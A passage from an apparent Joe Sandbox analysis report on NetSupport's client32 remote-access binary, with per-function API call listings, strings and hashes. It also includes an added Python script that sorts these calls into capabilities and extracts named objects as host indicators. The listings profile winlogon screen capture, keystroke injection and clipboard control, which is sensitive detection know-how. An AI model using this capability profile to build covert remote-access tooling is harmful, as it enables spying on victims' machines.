                                                                                  • Opcode Fuzzy Hash: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                                  • Instruction Fuzzy Hash: BD11DA39E4937666D712EAFE9C44B7AB7D8ABC07A8B014471FC69E3540FB20D450C7A1
                                                                                  APIs
                                                                                  Strings
                                                                                  • ..\ctl32\Remote.cpp, xrefs: 111133D4
                                                                                  • nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountIconicTick
                                                                                  • String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
                                                                                  • API String ID: 1307367305-2838568823
                                                                                  • Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                  • Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
                                                                                  • Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                  • Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A
APIs
• IsIconic.USER32(000000FF), ref: 110C10AD
• ShowWindow.USER32(000000FF,00000009,?,1105E793,00000001,00000001,?,00000000), ref: 110C10BD
• BringWindowToTop.USER32(000000FF), ref: 110C10C7
• GetCurrentThreadId.KERNEL32 ref: 110C10E8
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$BringCurrentIconicShowThread
• String ID:
• API String ID: 4184413098-0
• Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
• Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
• Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
• Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0
APIs
• DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
• keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 11113215
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated dumps: the same twelve client32 dumps listed for the entries above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ControlDevicekeybd_event
• String ID:
• API String ID: 1421710848-0
• Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
• Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
• Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
• Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0
APIs
• GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110335F6
• SetClipboardData.USER32(00000000,00000000), ref: 11033612
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated dumps: the same twelve client32 dumps listed for the entries above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Clipboard$DataFormatName
• String ID:
• API String ID: 3172747766-0
• Opcode ID: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
• Instruction ID: d021e7b1abaf81fd48200924965e9797cc36530c630056afc83bc75e16402c3f
• Opcode Fuzzy Hash: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
• Instruction Fuzzy Hash: 6701D830D2E124AEC714DF608C8097EB7ACEF8960BB018556FC419A380EF29A601D7F6
APIs
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated dumps: the same twelve client32 dumps listed for the entries above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Library$_memset$AddressFreeLoadProcwsprintf$_malloc
• String ID: %02x%02x%02x%02x%02x%02x$%d adapters in chain, %d adapters by size$* $3$CLTCONN.CPP$GetAdaptersInfo$IPHLPAPI.DLL$Info. Netbios macaddr=%s$Info. Set MacAddr to %s$Info. Unable to load netapi32$Info. macaddr[%d]=%s, ipaddr=%hs/%hs$ListenAddress$Netbios$TCPIP$VIRTNET$Warning. Netbios() returned x%x$netapi32.dll$pGetAdaptersInfo
• API String ID: 2942389153-3574733319
• Opcode ID: f1fcfdfcebd535121605e78cbc7b6af66c1befebb3baa01e0cc626f757530eba
• Instruction ID: 9380186eaa86aba5e78307d08d1cef0eec38285017acdf678952b44c5cd5fdba
• Opcode Fuzzy Hash: f1fcfdfcebd535121605e78cbc7b6af66c1befebb3baa01e0cc626f757530eba
• Instruction Fuzzy Hash: 60E13A75D1429A9FEB17CB648C90BEEBBF96F85305F4400D9E858B7240E630AB44CF61
APIs
• OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
• OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
• OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
• WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FA), ref: 110B3183
• OpenFileMappingA.KERNEL32(000F001F,00000000,Client32DIB), ref: 110B31A6
• MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
• GetDC.USER32(00000000), ref: 110B31E8
• CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
• CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
• SelectObject.GDI32(00000000,00000000), ref: 110B3236
• GetTickCount.KERNEL32 ref: 110B323F
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
• GetTickCount.KERNEL32 ref: 110B327F
• GetLastError.KERNEL32(00000000), ref: 110B328E
• GdiFlush.GDI32 ref: 110B32A2
• SelectObject.GDI32(00000000,?), ref: 110B32AD
• DeleteObject.GDI32(00000000), ref: 110B32B4
• SetEvent.KERNEL32(?), ref: 110B32BE
• DeleteDC.GDI32(00000000), ref: 110B32C8
• ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
• UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
• CloseHandle.KERNEL32(00000000), ref: 110B32E5
• CloseHandle.KERNEL32(00000000), ref: 110B3309
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated dumps: the same twelve client32 dumps listed for the entries above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
• String ID: @Ls$Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
• API String ID: 2071925733-1846869080
• Opcode ID: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
• Instruction ID: 4116a02b123aa608432531ba698621a05075ff29bb652617cbc71955754d1d1a
• Opcode Fuzzy Hash: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
• Instruction Fuzzy Hash: A9518679E40229ABDB14CFE4CD89F9EBBB4FB48704F104064F921AB644D774A900CB65
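The per-function listings above are raw API call sequences: a desktop blit driven through a named file mapping and three named events (the "blitting from winlogon" path), keybd_event and DeviceIoControl, clipboard writes, window foregrounding, and LoadLibrary/GetProcAddress imports. When many such entries have to be read, it helps to reduce each one to a capability summary and to pull out the named kernel objects (event, section and DLL names) that double as host-based indicators. The Python below is an added example written for this page, not Joe Sandbox's own code and not NetSupport's; the CAPABILITIES map is an assumption of the example, and the two sample entries are copied from the listings on this page.

```python
"""Added example (not Joe Sandbox or NetSupport code): reduce a Joe Sandbox
per-function API listing to a capability summary plus the named objects
(event, section and DLL names) it references. CAPABILITIES is this example's
own assumption; the two sample entries are copied from the report above."""
import re
from collections import defaultdict

# Assumed mapping from Win32 API name to the remote-control capability it serves.
CAPABILITIES = {
    "screen_capture": {"BitBlt", "CreateDIBSection", "GetDC", "CreateCompatibleDC", "GdiFlush"},
    "shared_memory_ipc": {"OpenFileMappingA", "MapViewOfFile", "OpenEventA", "SetEvent"},
    "input_injection": {"keybd_event", "mouse_event", "SendInput"},
    "clipboard": {"GetClipboardFormatNameA", "SetClipboardData", "GetClipboardData"},
    "window_control": {"IsIconic", "ShowWindow", "BringWindowToTop"},
    "dynamic_import": {"LoadLibraryA", "GetProcAddress", "GetModuleHandleA"},
}
# One report line: "• [Part of subcall function ADDR: ]Api.MODULE[(args)], ref: ADDR"
API_LINE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function\s+[0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
HEX = re.compile(r"^[0-9A-Fa-f]+$")

def parse_api_lines(entry_text):
    """Calls listed under the entry's 'APIs' header, up to the next section header."""
    calls, in_apis = [], False
    for raw in entry_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            in_apis = True
            continue
        if in_apis and not line.startswith("•"):
            in_apis = False                     # e.g. "Memory Dump Source"
        m = API_LINE.match(line) if in_apis else None
        if not m:
            continue
        args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
        calls.append({"api": m.group("api"), "module": m.group("mod"), "args": args,
                      "ref": m.group("ref"), "subcall": m.group("sub") is not None})
    return calls

def named_objects(calls):
    """Arguments that are neither hex immediates nor '?': resolved event, section
    and DLL names, which double as host-based indicators."""
    return sorted({a for c in calls for a in c["args"] if a != "?" and not HEX.match(a)})

def classify(calls):
    """Bucket the observed APIs by the assumed capability map (deduplicated)."""
    seen = defaultdict(set)
    for c in calls:
        for cap, apis in CAPABILITIES.items():
            if c["api"] in apis:
                seen[cap].add(c["api"])
    return {cap: sorted(v) for cap, v in sorted(seen.items())}

def triage(entry_text):
    calls = parse_api_lines(entry_text)
    return {"calls": len(calls), "subcalls": sum(c["subcall"] for c in calls),
            "capabilities": classify(calls), "named_objects": named_objects(calls)}

# Copied from the report: the function that blits the winlogon desktop via a shared section.
SCRAPE_ENTRY = """APIs
• OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
• OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
• OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
• WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FA), ref: 110B3183
• OpenFileMappingA.KERNEL32(000F001F,00000000,Client32DIB), ref: 110B31A6
• MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
• GetDC.USER32(00000000), ref: 110B31E8
• CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
• CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
• SelectObject.GDI32(00000000,00000000), ref: 110B3236
• GetTickCount.KERNEL32 ref: 110B323F
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
• GetTickCount.KERNEL32 ref: 110B327F
• GetLastError.KERNEL32(00000000), ref: 110B328E
• GdiFlush.GDI32 ref: 110B32A2
• SelectObject.GDI32(00000000,?), ref: 110B32AD
• DeleteObject.GDI32(00000000), ref: 110B32B4
• SetEvent.KERNEL32(?), ref: 110B32BE
• DeleteDC.GDI32(00000000), ref: 110B32C8
• ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
• UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
• CloseHandle.KERNEL32(00000000), ref: 110B32E5
• CloseHandle.KERNEL32(00000000), ref: 110B3309
Memory Dump Source
"""
# Copied from the report: dynamic import of psapi.dll, with subcall lines.
LOADLIB_ENTRY = """APIs
• LoadLibraryA.KERNEL32(psapi.dll,50D94AA1,00000002,11030250,?,00000000,1118A896,000000FF,?,1110809F,00000000,?,11030250,00000000,00000000), ref: 1110708D
  • Part of subcall function 11138260: GetVersion.KERNEL32(00000000,76230BD0,00000000), ref: 11138283
  • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
  • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
  • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
  • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
  • Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7
"""

if __name__ == "__main__":
    for entry in (SCRAPE_ENTRY, LOADLIB_ENTRY):
        print(triage(entry))
```

The named-object extraction is the part worth keeping: the Client32DIB section and Client32DIBQuit/Blit/Done events are the same strings the report lists under String ID for this function, and they can be checked for on a live host (object directory listing) without needing the binary. Subcall lines are kept but flagged, since their APIs belong to a callee rather than to the function under review.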
APIs
  • Part of subcall function 1105E950: __itow.LIBCMT ref: 1105E975
• GetObjectA.GDI32(?,0000003C,?), ref: 110054E5
  • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
  • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
• wsprintfA.USER32 ref: 1100553D
• DeleteObject.GDI32(?), ref: 11005592
• DeleteObject.GDI32(?), ref: 1100559B
• SelectObject.GDI32(?,?), ref: 110055B2
• DeleteObject.GDI32(?), ref: 110055B8
• DeleteDC.GDI32(?), ref: 110055BE
• SelectObject.GDI32(?,?), ref: 110055CF
• DeleteObject.GDI32(?), ref: 110055D8
• DeleteDC.GDI32(?), ref: 110055DE
• DeleteObject.GDI32(?), ref: 110055EF
• DeleteObject.GDI32(?), ref: 1100561A
• DeleteObject.GDI32(?), ref: 11005638
• DeleteObject.GDI32(?), ref: 11005641
• ShowWindow.USER32(?,00000009), ref: 1100566F
• PostQuitMessage.USER32(00000000), ref: 11005677
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated dumps: the same twelve client32 dumps listed for the entries above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
• String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
• API String ID: 2789700732-770455996
• Opcode ID: 56834972750135d32d4936fb2241e5d15490fd94ea77fe3d08ec2b617cfa6d3e
• Instruction ID: fd76b8300a222304a99732cac27ba94327f80de35dfbaf81c148901aa75ffadf
• Opcode Fuzzy Hash: 56834972750135d32d4936fb2241e5d15490fd94ea77fe3d08ec2b617cfa6d3e
• Instruction Fuzzy Hash: 24813775600609AFD368DBA5CD91EABF7F9BF8C704F00494DE5AAA7241CA74F801CB60
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(psapi.dll,50D94AA1,00000002,11030250,?,00000000,1118A896,000000FF,?,1110809F,00000000,?,11030250,00000000,00000000), ref: 1110708D
                                                                                    • Part of subcall function 11138260: GetVersion.KERNEL32(00000000,76230BD0,00000000), ref: 11138283
                                                                                    • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
                                                                                    • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
                                                                                    • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
                                                                                    • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
                                                                                    • Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7
                                                                                  • FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 111070DF
                                                                                  • LoadLibraryA.KERNEL32(Kernel32.dll,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 11107116
                                                                                  • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 111071A0
                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 111071F1
                                                                                  • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 1110726A
                                                                                  • SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
                                                                                  • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
                                                                                  • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0
                                                                                    • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                    • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                    • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000104,?,1110809F), ref: 11107446
                                                                                    • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000000,?,00000104,?,1110809F), ref: 11107360
                                                                                  • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
                                                                                  • CloseHandle.KERNEL32(?,?,00000000,?,00000104,?,1110809F), ref: 1110743F
                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Library$Handle$ErrorFreeLastProcess$CloseLoadModuleOpenToken$FileImageInformationNameVersion_memset_strrchr
                                                                                  • String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
                                                                                  • API String ID: 348974188-2591373181
                                                                                  • Opcode ID: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
                                                                                  • Instruction ID: c6fb8941b728de1d874c8cf5bae9c94d2d097e9c1a5b8d4b24900e8511d45065
                                                                                  • Opcode Fuzzy Hash: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
                                                                                  • Instruction Fuzzy Hash: A2C17DB1D0066A9FDB22DF658D846ADFAB8BB09314F4141FAE65CE7280D7309B84CF51
                                                                                  APIs
                                                                                  • OpenFileMappingA.KERNEL32(000F001F,00000000,-00000007), ref: 1105D277
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1105D294
                                                                                  • GetDC.USER32(00000000), ref: 1105D2BB
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 1105D2CF
                                                                                  • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 1105D2F2
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 1105D300
                                                                                  • GetTickCount.KERNEL32 ref: 1105D30F
                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1105D333
                                                                                  • GetTickCount.KERNEL32 ref: 1105D33C
                                                                                  • GetLastError.KERNEL32(?), ref: 1105D348
                                                                                  • GdiFlush.GDI32 ref: 1105D35C
                                                                                  • SelectObject.GDI32(00000000,?), ref: 1105D367
                                                                                  • DeleteObject.GDI32(00000000), ref: 1105D36E
                                                                                  • DeleteDC.GDI32(00000000), ref: 1105D378
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 1105D384
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 1105D38E
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 1105D396
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileObject$CountCreateDeleteSelectTickView$CloseCompatibleErrorFlushHandleLastMappingOpenReleaseSectionUnmap
                                                                                  • String ID: /thumb:$@Ls$Error %d blitting from winlogon, took %d ms$ThumbWL
                                                                                  • API String ID: 652520247-902970609
                                                                                  • Opcode ID: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                                  • Instruction ID: 78b6d8997dae8530c3cf648a665dcf4201cc58d59c57f0d4bee68b800920de56
                                                                                  • Opcode Fuzzy Hash: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                                  • Instruction Fuzzy Hash: 924190B9E41229AFD704CFA4DD89FAEBBB8FB48704F104165F920A7644D730A901CBA1
                                                                                  APIs
                                                                                    • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                    • Part of subcall function 110CFE80: _malloc.LIBCMT ref: 110CFE9A
                                                                                    • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
                                                                                  • wsprintfA.USER32 ref: 1102B84D
                                                                                    • Part of subcall function 110ED8F0: RegQueryInfoKeyA.ADVAPI32(0002001F,?,?,0002001F,?,?,0002001F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,1102B625), ref: 110ED926
                                                                                  • FileTimeToSystemTime.KERNEL32(0002001F,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 1102B65A
                                                                                  • wsprintfA.USER32 ref: 1102B69E
                                                                                  • wsprintfA.USER32 ref: 1102B705
                                                                                    • Part of subcall function 110EDF70: wsprintfA.USER32 ref: 110EDFD4
                                                                                    • Part of subcall function 110EDF70: _malloc.LIBCMT ref: 110EE053
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf$Time_malloc$EnumFileInfoOpenQuerySystem
